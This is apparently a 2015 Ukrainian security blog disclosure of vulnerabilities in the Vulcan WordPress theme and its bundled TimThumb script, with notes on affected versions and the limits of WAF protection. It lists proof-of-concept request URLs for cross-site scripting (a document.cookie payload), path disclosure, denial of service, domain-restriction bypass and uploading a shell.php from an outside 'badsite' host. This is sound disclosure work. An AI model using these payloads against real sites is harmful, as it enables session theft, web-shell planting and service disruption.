Численні уразливості в темі Vulcan для WordPress
23:55 02.07.2015Сьогодні я дослідив Cross-Site Scripting, Full path disclosure, Abuse of Functionality, Denial of Service та Arbitrary File Upload уразливості в темі Vulcan для WordPress. Ці уразливості аналогічні тим, що я знайшов в темах для WP ще у лютому 2011, коли виявив дірки в TimThumb (та деякі дірки у квітні).
XSS (WASC-08) (в старих версіях TimThumb):
http://site/wp-content/themes/vulcan/timthumb.php?src=%3Cbody%20onload=alert(document.cookie)%3E.jpg
Full path disclosure (WASC-13):
http://site/wp-content/themes/vulcan/timthumb.php?src=1
http://site/wp-content/themes/vulcan/timthumb.php?src=http://site/page.png&h=1&w=1111111
http://site/wp-content/themes/vulcan/timthumb.php?src=http://site/page.png&h=1111111&w=1
Abuse of Functionality (WASC-42):
http://site/wp-content/themes/vulcan/timthumb.php?src=http://site&h=1&w=1
http://site/wp-content/themes/vulcan/timthumb.php?src=http://site.badsite.com&h=1&w=1 (обхід обмежень на домен, якщо таке обмеження включене)
DoS (WASC-10):
http://site/wp-content/themes/vulcan/timthumb.php?src=http://site/big_file&h=1&w=1
http://site/wp-content/themes/vulcan/timthumb.php?src=http://site.badsite.com/big_file&h=1&w=1 (обхід обмежень на домен, якщо таке обмеження включене)
Arbitrary File Upload (WASC-31) (в старих версіях TimThumb):
http://site/wp-content/themes/vulcan/timthumb.php?src=http://site.badsite.com/shell.php
Full path disclosure (WASC-13):
http://site/wp-content/themes/vulcan/
Окрім index.php також можливі FPD в інших php-файлах в цій темі.
Уразливі всі версії теми Vulcan для WordPress (в останніх версіях виправлені лише уразливості в TimThumb, але все ще є FPD в інших php-файлах).
У версіях TimThumb до 2.8, де виправлена XSS, наявні всі інші уразливості. А починаючи з версії 2.8 виправлені всі уразливості. Але дірки AoF і DoS виправлені шляхом заборони зовнішніх хостів по замовчуванню. Якщо змінити налаштування (дозволити окремі чи всі зовнішні хости), що програма дозволяє, то знову можна буде проводити атаки на інші сайти. На деяких сайтах не оновлена версія TimThumb в темі, але вони захищаються WAF (як ModSecurity). Зазначу, що WAF не захистить від FPD дірок в цій темі та TimThumb, а в деяких випадках не захистить від AoF і DoS.